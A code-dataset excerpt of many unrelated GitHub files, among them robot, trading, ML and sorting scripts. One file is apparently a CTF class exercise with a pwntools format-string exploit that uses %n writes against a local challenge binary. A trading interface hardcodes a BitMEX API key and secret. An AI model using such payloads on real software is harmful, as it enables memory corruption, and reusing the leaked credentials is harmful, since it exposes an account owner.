print(dp)","repo_name":"shimamura10/Atcoder","sub_path":"過去問/単発/220d.py","file_name":"220d.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74397836967","text":"# @Time : 2018/6/15 17:44\n# @Author : cap\n# @FileName: myGevent.py\n# @Software: PyCharm Community Edition\nimport gevent\nfrom gevent import monkey\n\nmonkey.patch_all()\nfrom socket import *\n\n\ndef handle(c):\n while True:\n data = c.recv(1024).decode()\n if not data:\n break\n else:\n print(data)\n c.send(b'i have received')\n\n\ndef server():\n s = socket()\n s.bind('0.0.0.0', 9000)\n s.listen()\n\n while True:\n c, addr = s.accept()\n print('connect from', addr)\n gevent.spawn(handle, c)\n","repo_name":"zhnin/mypython","sub_path":"modules/gevent/myGevent.py","file_name":"myGevent.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33516287723","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\nimport csv\nimport argparse\n\n\ndef main(csv_file):\n with open(csv_file, encoding='utf-8') as cfile:\n c_reader = csv.reader(cfile)\n for row in c_reader:\n out_str = [empty_str_to_none(val) for val in row]\n print(tuple(out_str), ',', sep='')\n\n\ndef empty_str_to_none(value):\n '''Convert any empty string to None'''\n if value == '':\n return None\n return value\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser('csv_to_tup')\n parser.add_argument('-c', '--csv_file', help='name of csv file', required=True)\n args = parser.parse_args()\n\n main(args.csv_file)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/scripts/misc/csv_to_tuple_str.py","file_name":"csv_to_tuple_str.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70315462887","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass TensorFlowInfer:\n \"\"\"\n Implements TensorFlow inference of a saved model, following the same API as the TensorRTInfer class.\n \"\"\"\n\n def __init__(self, saved_model_path):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n self.model = tf.saved_model.load(saved_model_path)\n self.pred_fn = self.model.signatures['serving_default']\n\n # Setup I/O bindings\n self.batch_size = 1\n self.inputs = []\n fn_inputs = self.pred_fn.structured_input_signature[1]\n for i, input in enumerate(list(fn_inputs.values())):\n self.inputs.append({\n 'index': i,\n 'name': input.name,\n 'dtype': np.dtype(input.dtype.as_numpy_dtype()),\n 'shape': [1, 512, 512, 3], # This can be overridden later\n })\n self.outputs = []\n fn_outputs = self.pred_fn.structured_outputs\n for i, output in enumerate(list(fn_outputs.values())):\n self.outputs.append({\n 'index': i,\n 'name': output.name,\n 'dtype': np.dtype(output.dtype.as_numpy_dtype()),\n 'shape': output.shape.as_list(),\n })\n\n def override_input_shape(self, input, shape):\n self.inputs[input]['shape'] = shape\n self.batch_size = shape[0]\n\n def input_spec(self):\n return self.inputs[0]['shape'], self.inputs[0]['dtype']\n\n def output_spec(self):\n return self.outputs[0]['shape'], self.outputs[0]['dtype']\n\n def infer(self, batch):\n # Process I/O and execute the network\n input = {self.inputs[0]['name']: tf.convert_to_tensor(batch)}\n output = self.pred_fn(**input)\n return output\n\n def process(self, batch, scales=None, nms_threshold=None):\n # Infer network\n output = self.infer(batch)\n\n # Extract the results depending on what kind of saved model this is\n boxes = None\n scores = None\n classes = None\n if len(self.outputs) == 1:\n # Detected as AutoML Saved Model\n assert len(self.outputs[0]['shape']) == 3 and self.outputs[0]['shape'][2] == 7\n results = output[self.outputs[0]['name']].numpy()\n boxes = results[:, :, 1:5]\n scores = results[:, :, 5]\n classes = results[:, :, 6].astype(np.int32)\n elif len(self.outputs) >= 4:\n # Detected as TFOD Saved Model\n assert output['num_detections']\n num = int(output['num_detections'].numpy().flatten()[0])\n boxes = output['detection_boxes'].numpy()[:, 0:num, :]\n scores = output['detection_scores'].numpy()[:, 0:num]\n classes = output['detection_classes'].numpy()[:, 0:num]\n\n # Process the results\n detections = [[]]\n normalized = (np.max(boxes) < 2.0)\n for n in range(scores.shape[1]):\n if scores[0][n] == 0.0:\n break\n scale = self.inputs[0]['shape'][2] if normalized else 1.0\n if scales:\n scale /= scales[0]\n if nms_threshold and scores[0][n] < nms_threshold:\n continue\n detections[0].append({\n 'ymin': boxes[0][n][0] * scale,\n 'xmin': boxes[0][n][1] * scale,\n 'ymax': boxes[0][n][2] * scale,\n 'xmax': boxes[0][n][3] * scale,\n 'score': scores[0][n],\n 'class': int(classes[0][n]) - 1,\n })\n return detections\n\n\ndef main(args):\n print(\"Running in benchmark mode\")\n tf_infer = TensorFlowInfer(args.saved_model)\n input_size = [int(v) for v in args.input_size.split(\",\")]\n assert len(input_size) == 2\n tf_infer.override_input_shape(0, [args.batch_size, input_size[0], input_size[1], 3])\n spec = tf_infer.input_spec()\n batch = 255 * np.random.rand(*spec[0]).astype(spec[1])\n iterations = 200\n times = []\n for i in range(20): # Warmup iterations\n tf_infer.infer(batch)\n for i in range(iterations):\n start = time.time()\n tf_infer.infer(batch)\n times.append(time.time() - start)\n print(\"Iteration {} / {}\".format(i + 1, iterations), end=\"\\r\")\n print(\"Benchmark results include TensorFlow host overhead\")\n print(\"Average Latency: {:.3f} ms\".format(\n 1000 * np.average(times)))\n print(\"Average Throughput: {:.1f} ips\".format(\n tf_infer.batch_size / np.average(times)))\n\n print()\n print(\"Finished Processing\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--saved_model\", required=True,\n help=\"The TensorFlow saved model path to validate against\")\n parser.add_argument(\"-i\", \"--input_size\", default=\"512,512\",\n help=\"The input size to run the model with, in HEIGHT,WIDTH format\")\n parser.add_argument(\"-b\", \"--batch_size\", default=1, type=int,\n help=\"The batch size to run the model with\")\n args = parser.parse_args()\n main(args)\n","repo_name":"NVIDIA/TensorRT","sub_path":"samples/python/efficientdet/infer_tf.py","file_name":"infer_tf.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"32805334112","text":"'''\n- Immanuel - 2006463162\n- Pradipta Davi Valendra - 2006462664\n- Tara Mazaya Lababan - 2006473535\n\nPenjelasan:\nPayload berupa format string yang akan mengubah nilai variabel pada stack. \nDiurutkan berdasarkan nilai variable terkecil hingga terbesar.\n'''\nfrom pwn import *\n\nBINARY = ['./chall']\nIP, PORT = 'localhost', 7777\n\np = remote(IP, PORT)\n\npayload = b'%10c%4$n' # ----> nilai variabel (d) akan diubah menjadi 10\npayload += b'%1$5c%5$n' # ----> nilai variabel (e) akan diubah menjadi 10 + 5 = 15\npayload += b'%1$15c%2$n' # ----> nilai variabel (b) akan diubah menjadi 15 + 15 = 30\npayload += b'%1$15c%1$n' # ----> nilai variabel (a) akan diubah menjadi 30 + 15 = 45\npayload += b'A%3$n' # ----> nilai variabel (c) akan diubah menjadi 45 + 1 = 46\n\np.sendline(payload)\nsleep(1)\nprint(p.recv().decode(errors='ignore'))\n","repo_name":"valordra/ctf99_tools","sub_path":"Soal kelompok/kelompok7.py","file_name":"kelompok7.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75339901608","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib \n\n# 设置matplotlib正常显示中文和负号\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] # 用黑体显示中文\nmatplotlib.rcParams['axes.unicode_minus']=False # 正常显示负号\n\ndata=np.loadtxt(\"reject_sampling.txt\")\nplt.hist(data, bins=114,density=True,facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n# 显示横轴标签\nplt.xlabel(r\"$x$\")\n# 显示纵轴标签\nplt.ylabel(r\"probability density\")\nplt.show()","repo_name":"kaizewang/Computational_Physics_A","sub_path":"07_data_curve/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36772917392","text":"\r\n# this script will print on the terminal screen the Robot internal battery voltage\r\n# and Cozmo will speak alout the cube's battery percentage capacity remaining.\r\n# I have still to find out at what point the cube batteries fail\r\n# Bob 25th Feb 2018\r\n# This is Version 2 Change is that the internal battery voltage now only reports to 3 decimal places for brevity.\r\n# Bob 04th Mar 2018\r\n\r\n\r\nimport asyncio\r\nimport cozmo\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\n\r\nasync def log_cube_info(robot: cozmo.robot.Robot, cube_id):\r\n cube = robot.world.get_light_cube(cube_id)\r\n if cube is not None:\r\n # Wait for up to few seconds for the cube to have received battery level info\r\n for i in range(30):\r\n if cube.battery_voltage is None:\r\n if i == 0:\r\n cozmo.logger.info(\"Cube %s waiting for battery info...\", cube_id)\r\n await asyncio.sleep(0.5)\r\n else:\r\n break\r\n cozmo.logger.info(\"Cube %s battery = %s\", cube_id, cube.battery_str)\r\n #await robot.say_text (\"My internal Battery Voltage Currently is: %s\" % robot.battery_voltage,).wait_for_completed()\r\n await robot.say_text (\"cube %s battery = %s \" %(cube_id, cube.battery_str)).wait_for_completed()\r\n print(\"cube %s battery = %s \" %(cube_id, cube.battery_str))\r\n \r\n else:\r\n \r\n cozmo.logger.warning(\"Cube %s is not connected - check the battery.\", cube_id)\r\n \r\n\r\nasync def cozmo_program(robot: cozmo.robot.Robot):\r\n \r\n print(\"My internal Battery Voltage Currently is: %.3f\" % robot.battery_voltage)\r\n \r\n \r\n \r\n await log_cube_info(robot, LightCube1Id) # looks like a paperclip\r\n await log_cube_info(robot, LightCube2Id) # looks like a lamp / heart\r\n await log_cube_info(robot, LightCube3Id) # looks like the letters 'ab' over 'T'\r\n await robot.say_text (\"My internal Battery Voltage Currently is: %.3f Volts\" % robot.battery_voltage,).wait_for_completed()\r\n\r\ncozmo.robot.Robot.drive_off_charger_on_connect = False\r\n\r\ncozmo.run_program(cozmo_program)\r\n","repo_name":"rsmith21/cozmo","sub_path":"Cube Battery level_working.py","file_name":"Cube Battery level_working.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26894002688","text":"from utils.util import (\n check_required_parameter,\n check_required_parameters,\n check_enum_parameter,\n)\n\n\n\nclass SpotWallet:\n async def system_status(self):\n \"\"\"System Status (System)\n Fetch system status.\n\n GET /sapi/v1/system/status\n\n https://binance-docs.github.io/apidocs/spot/en/#system-status-sapi-system\n \"\"\"\n\n return await self.query(\"/sapi/v1/system/status\")\n\n async def coin_info(self, **kwargs):\n \"\"\"All Coins' Information (USER_DATA)\n Get information of coins (available for deposit and withdraw) for user.\n\n GET /sapi/v1/capital/config/getall\n\n https://binance-docs.github.io/apidocs/spot/en/#all-coins-39-information-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/capital/config/getall\", kwargs)\n\n async def account_snapshot(self, type: str, **kwargs):\n \"\"\"Daily Account Snapshot (USER_DATA)\n\n GET /sapi/v1/accountSnapshot\n\n https://binance-docs.github.io/apidocs/spot/en/#daily-account-snapshot-user_data\n\n Parameteres:\n type -- mandatory/string -- \"SPOT\", \"MARGIN\", \"FUTURES\"\n\n Args:\n type (str): \"SPOT\", \"MARGIN\", \"FUTURES\"\n Keyword Args:\n startTime (int, optional)\n endTime (int, optional)\n limit (int, optional): min 7, max 30, async default 7\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n check_required_parameter(type, \"type\")\n payload = {\"type\": type, **kwargs}\n return await self.sign_request(\"GET\", \"/sapi/v1/accountSnapshot\", payload)\n\n async def account_status(self, **kwargs):\n \"\"\"Account Status (USER_DATA)\n Fetch account status detail.\n\n GET /sapi/v1/account/status\n\n https://binance-docs.github.io/apidocs/spot/en/#account-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/account/status\", kwargs)\n\n async def api_trading_status(self, **kwargs):\n \"\"\"Account API Trading Status (USER_DATA)\n Fetch account api trading status detail.\n\n GET /sapi/v1/account/apiTradingStatus\n\n https://binance-docs.github.io/apidocs/spot/en/#account-api-trading-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiTradingStatus\", kwargs\n )\n\n async def asset_detail(self, **kwargs):\n \"\"\"Asset Detail (USER_DATA)\n Fetch details of assets supported on Binance.\n\n GET /sapi/v1/asset/assetDetail\n\n https://binance-docs.github.io/apidocs/spot/en/#asset-detail-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/assetDetail\", kwargs)\n\n async def trade_fee(self, **kwargs):\n \"\"\"Trade Fee (USER_DATA)\n Fetch trade fee, values in percentage.\n\n GET /sapi/v1/asset/traasync defee\n\n https://binance-docs.github.io/apidocs/spot/en/#trade-fee-sapi-user_data\n\n Keyword Args:\n symbol (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/traasync defee\", kwargs)\n\n async def funding_wallet(self, **kwargs):\n \"\"\"Funding Wallet (USER_DATA)\n\n POST /sapi/v1/asset/get-funding-asset\n\n https://binance-docs.github.io/apidocs/spot/en/#funding-wallet-user_data\n\n Keyword Args:\n asset (str, optional)\n needBtcValuation (str, optional): true or false\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"POST\", \"/sapi/v1/asset/get-funding-asset\", kwargs\n )\n\n async def user_asset(self, **kwargs):\n \"\"\"User Asset (USER_DATA)\n\n Get user assets, just for positive data.\n\n Weight(IP): 5\n\n POST /sapi/v3/asset/getUserAsset\n\n https://binance-docs.github.io/apidocs/spot/en/#user-asset-user_data\n\n Keyword Args:\n asset (str, optional): If asset is blank, then query all positive assets user have.\n needBtcValuation (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n url_path = \"/sapi/v3/asset/getUserAsset\"\n return await self.sign_request(\"POST\", url_path, {**kwargs})\n\n async def api_key_permissions(self, **kwargs):\n \"\"\"Get API Key Permission (USER_DATA)\n\n GET /sapi/v1/account/apiRestrictions\n\n https://binance-docs.github.io/apidocs/spot/en/#get-api-key-permission-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiRestrictions\", kwargs\n )\n\n\n","repo_name":"majiayu000/Binance-api","sub_path":"spot/_wallet.py","file_name":"_wallet.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70454829287","text":"import torch\nimport nvfuser_extension # noqa: F401\n\nt = torch.randn((5, 5), device='cuda')\nexpected = torch.sinh(t)\noutput = torch.ops.myop.sinh_nvfuser(t)\n\nprint(\"Expected:\", expected)\nprint(\"Output:\", output)\n\nassert torch.allclose(output, expected)\nprint(\"They match!\")\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"third_party/nvfuser/examples/sinh_extension/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17015327321","text":"from maxlib import *\nfrom binancelib import *\nfrom bitmex import *\nimport pymongo\nfrom mongo_order import *\nfrom pymongo import MongoClient\nimport urllib \nimport logging\nfrom Websocket.util.api_key import generate_nonce, generate_signature\nfrom Websocket import bitmex_websocket\nimport logging\nfrom time import sleep\nimport threading\nbitmex_api_key = 'CjyHN90eGN8Iby8Cnl6kaSJZ'\nbitmex_api_secret = 'GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6'\nclass Interface():\n\tdef __init__(self):\n\t\tself.Max = MaxLib(\"\",\n\t\t\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\tself.bitmex = Bitmex('CjyHN90eGN8Iby8Cnl6kaSJZ','GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6')\n\t\tself.Bin = BinanceLib(\"\",\n\t\t\t\t\"\")\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef Order_info(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Order_process(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Order_process(market)\n\tdef Post_orders(self, exchange, market, side, volume, price, types,userID):\n\t\tneworder = {'userID':userID,'exchange':exchange,'market':market,'orderside':side,'ordertype':types,'price':price,'volume':volume,'statue':0}\n\t\tif(exchange == \"bin\"):\n\t\t\torder = self.Bin.Post_orders(market, side, str(volume), str(price), types)\n\t\telif(exchange == \"max\"):\t\t\n\t\t\torder = self.Max.Post_orders(market, side, volume, price, types)\n\t\telif(exchange == 'bitmex'):\n\t\t\torder = self.bitmex.Post_orders(market ,side,float(volume), price, types)\n\t\tneworder['orderID'] = order['orderID']\n\t\tself.mongo.AddOrder(neworder)\n\tdef ClearAll(self, exchange, market):#???\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Clear_all(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Orders_clear(market)\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.DeleteAllOrder(market)\n\tdef DeleteOrdersByOid(self, exchange, market, idnumber):\n\t\tresult = []\n\t\tif(exchange == \"bin\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Bin.Delete_orders(market,i[\"id\"]))\n\t\telif(exchange == \"max\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Max.Delete_orders(i[\"id\"]))\n\t\telif(exchange == 'bitmex'):\n\t\t\tmyquery = []\n\t\t\tfor id in idnumber:\n\t\t\t\tresult.append(self.bitmex.DeleteOrder(id))\n\t\t\t\tmyquery.append(id)\n\t\tprint (myquery)\n\t\tfor id in myquery:\n\t\t\tself.mongo.DeleteByOid(id)\n\t\treturn result\n\tdef GetOrders(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Get_orders(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Trades_my(market, \"100\")\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.GetOrder(market)\n\tdef GetOrder(self, exchange, ids):\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Get_order(ids)\n\t\telif(exchange == \"bitmex\"):\n\t\t\tresult = []\n\t\t\torders = self.bitmex.GetOrder()[0]\n\t\t\tfor order in orders:\n\t\t\t\tif(order['orderid'] in ids):\n\t\t\t\t\tresult.append(order)\n\t\t\treturn result\n\tdef Account(self, exchange):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Account()\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Account()\nclass MyThread(threading.Thread):\n\tdef __init__(self,key,secret,symbol,userID):\n\t\tthreading.Thread.__init__(self)\t\t\n\t\tself.ws = bitmex_websocket.BitMEXWebsocket(endpoint=\"https://testnet.bitmex.com/api/v1\", symbol = symbol,api_key = key, api_secret = secret)\n\t\tself.interface = Interface()\t\n\t\tself.symbol = symbol\n\t\tself.userid = userID\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef run(self):\n\t\twhile(self.ws.ws.sock.connected):\n\t\t\tinfors = self.ws.GetOrder()\n\t\t\tself.ChangeOrderStatus(infors)\n\t\t\tsleep(10)\t\t\n\tdef ChangeOrderStatus(self, infors):\n\t\torders = self.interface.GetOrders('bitmex',self.symbol)[0]\n\t\tids = []\n\t\tfor infor in infors:\n\t\t\tids.append(infor['orderID'])\n\t\tfor order in orders:\n\t\t\tprint ('!')\n\t\t\tprint (order)\n\t\t\tif(order['orderid'] not in ids):\n\t\t\t\tself.mongo.UpdateStatusById(order['orderid'])\ntest = MyThread(bitmex_api_key,bitmex_api_secret,'XBTUSD','1')\ntest.start()\ninte = Interface()\n#inte.ClearAll('bitmex','2')\n#inte.GetOrderStatus('XBTUSD','1')\n#exchange, market, side, volume, price, types, marketnameindex = None\ninte.Post_orders('bitmex','XBTUSD','Buy',5,4002,'limit','1')\n#inte.Post_orders('bitmex','XBTUSD','Buy',5,234,'limit')\n#inte.Post_orders('bitmex','ETHUSD','Buy',5,155,'limit')\n#exchange, market, idnumber\n#print (inte.Get_orders('bitmex',''))\n#inte.DeleteOrdersByOid('bitmex','ETHUSD',['29b030cd-d57d-068f-f2c0-357d2f9a6b7b'])\n\n#inte.Clear_all('bitmex','')\n","repo_name":"jmike1211/py-cryptoTrade","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6575391551","text":"\nn, m = map(int, input().split())\na = []\nmx = 0\nmn = 1000000\nfor i in range(n):\n x = list(map(int, input().split()))\n tmpmax = max(x)\n mx = max(tmpmax, mx)\n tmpmin = min(x)\n mn = min(tmpmin, mn)\n a.append(x)\nflat = True\n\ntmp = mx-mn\n\nfor i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n flat = False\n break\n if(flat == False):\n break\nif(flat):\n print('NOT FOUND')\nelse:\n print(tmp)\n for i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n print(\"Vi tri [\" + str(i) + \"][\" + str(j) + \"]\")\n \n ","repo_name":"bakachanbaby/code_ptit","sub_path":"so_may_man_trong_ma_tran.py","file_name":"so_may_man_trong_ma_tran.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17790472343","text":"# Quick Sort 퀵정렬\n# 비슷한 속도를 자랑하는 병합정렬도 있음\n\n# 원리 : 기준을 설정, 큰수와 작은 수를 교환하고 리스트를 반으로 나누는 방식\n\n'''\n퀵은 Pivot피벗이란 개념을 사용\n= 큰 숫자, 작은 숫자 교환 시의 교환 기준\n\n퀵 정렬 사용 전 피벗을 어떻게 설정할 지 명시 필요\n본 코드는 Hoare Partition 호어 분할 방식을 기준으로 적용\n\n호어 분할 - 리스트에서 첫 번째 데이터를 피벗으로 정함\n1. 왼쪽에서부터 피벗보다 큰 데이터를 선택\n2. 오른쪽에서부터 피벗보다 작은 데이터를 선택\n3. 둘을 교체\n4. 반복\n5. 1과 2에서 찾은 값이 서로 순서가 엇갈리면 작은 데이터와 피벗을 교체\n(ex. 큰=5번, 작=4번)\n6. 피벗을 제외하고 좌, 우를 각각 위 과정 반복\n\n\n보통 재귀로 구현하며, 종료 조건은 리스트 내 원소가 1개인 경우\n'''\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end):\n if start >= end: #원소가 1개\n return\n pivot = start # 호어 분할\n left = start + 1\n right = end\n\n while left <= right:\n #피벗보다 큰 데이터 찾기\n while left <= end and array[left] <= array[pivot]:\n left += 1\n #피벗보다 작은 데이터\n while right > start and array[right] >= array[pivot]:\n right -= 1\n # 엇갈렸다면 교체 (피벗 - 작은데이터)\n if left > right:\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right],array[left]\n #분할 이후 왼쪽 + 오른쪽\n quick_sort(array, start, right -1)\n quick_sort(array, right + 1, end)\n\nquick_sort(array, 0, len(array) -1)\nprint(array)","repo_name":"rudgks8092/Book","sub_path":"CodingTest_with_Python/Chapter6_Sort/6-4(Quick).py","file_name":"6-4(Quick).py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35625096974","text":"import psycopg2\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\n \r\ndef create_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n CREATE TABLE IF NOT EXISTS autoplius (\\\r\n id serial PRIMARY KEY,\\\r\n manufacturingDate int,\\\r\n engine_l float8,\\\r\n power_kw float8,\\\r\n mileage_km float8,\\\r\n gearbox_auto int,\\\r\n gearbox_manual int,\\\r\n price_euro int\\\r\n );\\\r\n \")\r\n connection.commit()\r\n return \"Table successfully created\"\r\n\r\ndef drop_table() -> str:\r\n\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n DROP TABLE IF EXISTS autoplius;\\\r\n \")\r\n connection.commit()\r\n return \"Table autoplius was successfully dropped\"\r\n\r\ndef show_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n SELECT * from autoplius;\\\r\n \")\r\n return cur.fetchall()\r\n\r\ndef insert_example() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"insert into autoplius(\\\r\n manufacturingDate,\\\r\n engine_l,\\\r\n power_kw, \\\r\n mileage_km, \\\r\n gearbox_auto, \\\r\n gearbox_manual, \\\r\n price_euro) \\\r\n VALUES (2016, 1.5, 70.0, 188928.0, 0, 1, 7550 ) \\\r\n \")\r\n\r\nshow_table()","repo_name":"Folkas/project_24","sub_path":"packages/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72777061289","text":"def main():\n \"\"\"This program takes in the values of the ACT scores from every state\n and creates a histogram out of them.\"\"\"\n import readscores\n import numpy as np\n import matplotlib.pyplot as plt\n\n data = readscores.read_scored(\"actsat.txt\")\n counter = 0\n act_scores = []\n while counter < len(data):\n act_scores.append(float(data[counter][\"act_average_score\"]))\n counter += 1\n plt.hist(act_scores, bins=7, edgecolor=\"black\", color=\"blue\")\n plt.yticks(np.arange(0, 21, step=5))\n plt.ylabel(\"Number of States\")\n plt.xlabel(\"score out of 36\")\n plt.title(\"Histogram of ACT Scores\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adamponce/python_compiler","sub_path":"lab8/tests/python/scorehist.py","file_name":"scorehist.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30292314550","text":"from keras.datasets import mnist\n\nimport time\nimport os\nimport numpy as np\nimport random\nimport math\n\nimport tensorflow as tf\n\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsess = tf.Session(config=config)\n\nfrom keras.models import Model\nfrom keras.layers import Input, Lambda, Dense, Conv2D, MaxPool2D, Dropout, GlobalAveragePooling2D, \\\n\tBatchNormalization, Flatten\nfrom keras.utils import to_categorical\n\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nK.set_session(sess)\n\nfrom loss import LossFunction as my_loss\nimport latent\n\nFV_LENGTH = 64\n\nfrom sklearn.cluster import KMeans\n\n\ndef get_model(loss_type, alpha):\n\t\"\"\"Builds simple AlexNet-like architecture\n\n Returns:\n Keras Model with adaptive loss function incorporated\n \"\"\"\n\n\t# Initialize Input parameters\n\tinput_img = Input(shape=(1, 28, 28), name='input_data')\n\tinput_feature = Input(shape=(10,), dtype='float32', name='input_feature')\n\tinput_y = Input(shape=(10,), dtype='float32', name='input_y')\n\n\t# Build simple CNN for digits classification\n\tx = Conv2D(64, (3, 3), activation='relu')(input_img)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Conv2D(32, (3, 3), activation='relu')(x)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Dropout(rate=0.2)(x)\n\tx = Flatten()(x)\n\tcnn_model = Dense(128, activation='relu')(x)\n\tcnn_model_output = Dense(10, activation='softmax', name='p_out')(cnn_model)\n\n\tloss_function = my_loss(loss_type, alpha, 10)\n\n\t# Use Lambda layer to implement our custom loss function\n\t# todo: implement custom Layer\n\toutput = Lambda(loss_function.loss_main, output_shape=(1,), name='joint_loss')(\n\t\t[input_y, cnn_model_output, input_feature])\n\n\tmibl_model = Model([input_img, input_feature, input_y], output)\n\n\treturn mibl_model\n \n\ndef minibatch_mibl_gen(x, y, batch_size, fmodel, num_instances, num_clusters=100, fraction_class=1.0):\n\t\"\"\"Generator for multiple instance learning framework\n\n Args:\n x, y: image data and labels 